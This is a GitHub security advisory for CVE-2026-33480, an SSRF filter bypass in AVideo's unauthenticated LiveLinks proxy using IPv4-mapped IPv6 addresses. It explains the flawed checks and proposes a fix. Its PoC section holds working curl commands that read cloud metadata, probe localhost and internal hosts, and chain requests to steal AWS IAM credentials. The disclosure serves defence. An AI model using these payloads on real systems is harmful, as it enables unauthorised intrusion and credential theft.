Skip to content

AVideo has a SSRF Protection Bypass via IPv4-Mapped IPv6 Addresses in Unauthenticated LiveLinks Proxy

High severity GitHub Reviewed Published Mar 20, 2026 in WWBN/AVideo • Updated Mar 25, 2026

Package

composer wwbn/avideo (Composer)

Affected versions

<= 26.0

Patched versions

None

Description

Summary

The isSSRFSafeURL() function in AVideo can be bypassed using IPv4-mapped IPv6 addresses (::ffff:x.x.x.x). The unauthenticated plugin/LiveLinks/proxy.php endpoint uses this function to validate URLs before fetching them with curl, but the IPv4-mapped IPv6 prefix passes all checks, allowing an attacker to access cloud metadata services, internal networks, and localhost services.

Details

The isSSRFSafeURL() function in objects/functions.php (lines 4021-4169) implements SSRF protection with two separate check paths:

  1. IPv4 checks (lines 4101-4134): Regex patterns matching dotted-decimal notation (/^10\./, /^172\./, /^192\.168\./, /^127\./, /^169\.254\./)
  2. IPv6 checks (lines 4150-4166): Checks for ::1, fe80::/10 (link-local), and fc00::/7 (unique local)

The gap: IPv4-mapped IPv6 addresses (::ffff:0:0/96) are not checked in either path. When a URL like http://[::ffff:169.254.169.254]/ is provided:

// Line 4038: parse_url strips brackets from IPv6 host
$host = parse_url($url, PHP_URL_HOST);
// $host = "::ffff:169.254.169.254"

// Line 4079: filter_var recognizes it as valid IPv6, skips DNS resolution
if (!filter_var($host, FILTER_VALIDATE_IP)) {
    $resolvedIP = gethostbyname($host);  // SKIPPED
}
$ip = $host;  // $ip = "::ffff:169.254.169.254"

// Lines 4101-4134: IPv4 regex checks DON'T match (not dotted-decimal)
if (preg_match('/^169\.254\.\d{1,3}\.\d{1,3}$/', $ip))  // NO MATCH

// Lines 4150-4166: IPv6 checks don't cover ::ffff: prefix
if ($ip === '::1' || ...)                    // NO MATCH
if (preg_match('/^fe[89ab][0-9a-f]:/i', $ip))  // NO MATCH
if (preg_match('/^f[cd][0-9a-f]{2}:/i', $ip))  // NO MATCH

// Line 4168: returns TRUE — bypass complete
return true;

The vulnerable endpoint plugin/LiveLinks/proxy.php explicitly disables authentication:

// proxy.php lines 2-3
$doNotConnectDatabaseIncludeConfig = 1;
$doNotStartSessionbaseIncludeConfig = 1;

After the bypass, two requests are made to the attacker-controlled URL:

  1. get_headers() at line 40 (via stream context)
  2. fakeBrowser() at line 63 (via curl) — response content is echoed back to the attacker (lines 69-80)

PoC

Read AWS instance metadata (IAM credentials):

curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/'

Access localhost services:

curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:127.0.0.1]:3306/'

Scan internal network:

curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:10.0.0.1]/'

Steal AWS IAM role credentials (full chain):

# Step 1: Get IAM role name
ROLE=$(curl -s 'https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/')

# Step 2: Get temporary credentials for the role
curl -s "https://target.com/plugin/LiveLinks/proxy.php?livelink=http://[::ffff:169.254.169.254]/latest/meta-data/iam/security-credentials/${ROLE}"

Impact

  • Cloud credential theft: Unauthenticated attackers can read cloud instance metadata (AWS IMDSv1, GCP, Azure) to steal IAM credentials, potentially gaining full access to cloud infrastructure.
  • Internal network access: Attackers can scan and access internal services not exposed to the internet, including databases, admin panels, and other backend services.
  • Localhost service access: Attackers can interact with services bound to localhost (e.g., Redis, Memcached, internal APIs).
  • No authentication required: The endpoint explicitly disables session handling and database connections, making this exploitable by any anonymous internet user.

Recommended Fix

Replace the manual IPv4/IPv6 blocklist approach with PHP's built-in FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE flags, which correctly handle all private/reserved ranges including IPv4-mapped IPv6 addresses:

// In isSSRFSafeURL(), replace lines 4099-4166 with:

// Block all private and reserved IP ranges (handles IPv4, IPv6, and IPv4-mapped IPv6)
if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    _error_log("isSSRFSafeURL: blocked private/reserved IP: {$ip}");
    return false;
}

This single check replaces all the manual regex patterns and correctly handles:

  • All RFC 1918 private ranges (10/8, 172.16/12, 192.168/16)
  • Loopback (127/8, ::1)
  • Link-local (169.254/16, fe80::/10)
  • Unique local (fc00::/7)
  • IPv4-mapped IPv6 (::ffff:0:0/96) — the bypass vector in this finding
  • Other reserved ranges (0/8, 100.64/10 CGN, etc.)

References

@DanielnetoDotCom DanielnetoDotCom published to WWBN/AVideo Mar 20, 2026
Published to the GitHub Advisory Database Mar 20, 2026
Reviewed Mar 20, 2026
Published by the National Vulnerability Database Mar 23, 2026
Last updated Mar 25, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(13th percentile)

Weaknesses

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Learn more on MITRE.

CVE ID

CVE-2026-33480

GHSA ID

GHSA-p3gr-g84w-g8hh

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.